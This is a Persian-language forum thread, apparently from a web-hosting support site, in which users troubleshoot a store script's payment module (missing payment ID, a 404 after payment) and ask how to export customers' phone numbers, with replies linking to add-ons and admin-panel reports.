تو همیتن تاپیک یکی گفته بودم باید آخر آدرس "/" بزاری که من اصلا منظورشو نفهمیدم (در مورد این راه حل هم توضیح بدین)
خیلی ممنون

با سلام. من نسخه 1.58 نصب کردم .. همه چی درست هست زمانی که پرداخت موفق انجام میشه و صفحه پایانی میاد ،،،، شناسه پرداخت نمایش داده نمیشه. مشکل از کجاست ؟ چیکار کنم ؟

نقل قول:

---

نوشته اصلی توسط ALI-LORD

با سلام. من نسخه 1.58 نصب کردم .. همه چی درست هست زمانی که پرداخت موفق انجام میشه و صفحه پایانی میاد ،،،، شناسه پرداخت نمایش داده نمیشه. مشکل از کجاست ؟ چیکار کنم ؟

---

slm
کلا 1.58 مشکل داره. فایل payment.php 1.57 رو جایگزین کنید

من 1.57 نصب کردم ... وقتی پرداخت تکمیل میشه و مویخاد صفحه شناسه اینارو بیاره میزنه ارور 404 !!! مشکل از کجاست ؟>

نقل قول:

---

نوشته اصلی توسط ALI-LORD

من 1.57 نصب کردم ... وقتی پرداخت تکمیل میشه و مویخاد صفحه شناسه اینارو بیاره میزنه ارور 404 !!! مشکل از کجاست ؟>

---

فایل کانفیگ شما مشکل داره و آدرس داخل آن بدرستی ست نشده است.خواستین فایل رو پ خ کنید تا بررسی کنم

سلام
فروشگاه ما چند ساله با فریر دایره

میخواستم راهی است تا تمامی شماره تلفن های ثبت شده مشتری رو یکجا در یک فایل بدست اورد ؟

یا حداقل بشه از طریق خود فریز بهشون اس داد ؟

نقل قول:

---

نوشته اصلی توسط refigh

سلام
فروشگاه ما چند ساله با فریر دایره

میخواستم راهی است تا تمامی شماره تلفن های ثبت شده مشتری رو یکجا در یک فایل بدست اورد ؟

یا حداقل بشه از طریق خود فریز بهشون اس داد ؟

---

درود بله امکانش هست

نقل قول:

---

نوشته اصلی توسط refigh

سلام
فروشگاه ما چند ساله با فریر دایره

میخواستم راهی است تا تمامی شماره تلفن های ثبت شده مشتری رو یکجا در یک فایل بدست اورد ؟

یا حداقل بشه از طریق خود فریز بهشون اس داد ؟

---

http://www.softiran.org/view-item/98...ro-report.html

نقل قول:

---

نوشته اصلی توسط refigh

سلام
فروشگاه ما چند ساله با فریر دایره

میخواستم راهی است تا تمامی شماره تلفن های ثبت شده مشتری رو یکجا در یک فایل بدست اورد ؟

یا حداقل بشه از طریق خود فریز بهشون اس داد ؟

---

چند راه وجود داره. این راه رایگانش هست http://www.webhostingtalk.ir/showthread.php?t=77818


اینم ده تومنه http://www.webhostingtalk.ir/showthread.php?t=96142

اینم که خود سافتیران توی پست قبل گفتن که مورد اعتماد تره http://www.softiran.org/view-item/98...ro-report.html

اسکریپت سافت ایران خروجی شماره تماس ها و ایمیل ها رو هم داره ؟؟؟
روش کار به چی صورت است ؟
همون باید وارد ادمین فریر بشیم یا ادرسش فرق میکنه ؟

نقل قول:

---

نوشته اصلی توسط refigh

اسکریپت سافت ایران خروجی شماره تماس ها و ایمیل ها رو هم داره ؟؟؟
روش کار به چی صورت است ؟
همون باید وارد ادمین فریر بشیم یا ادرسش فرق میکنه ؟

---

http://my.plus-server.ir/cart.php?a=add&pid=84

درون مدیریت میتونید این کار رو انجام بدید
نصب و راه اندازی به صورت رایگان انجام میشه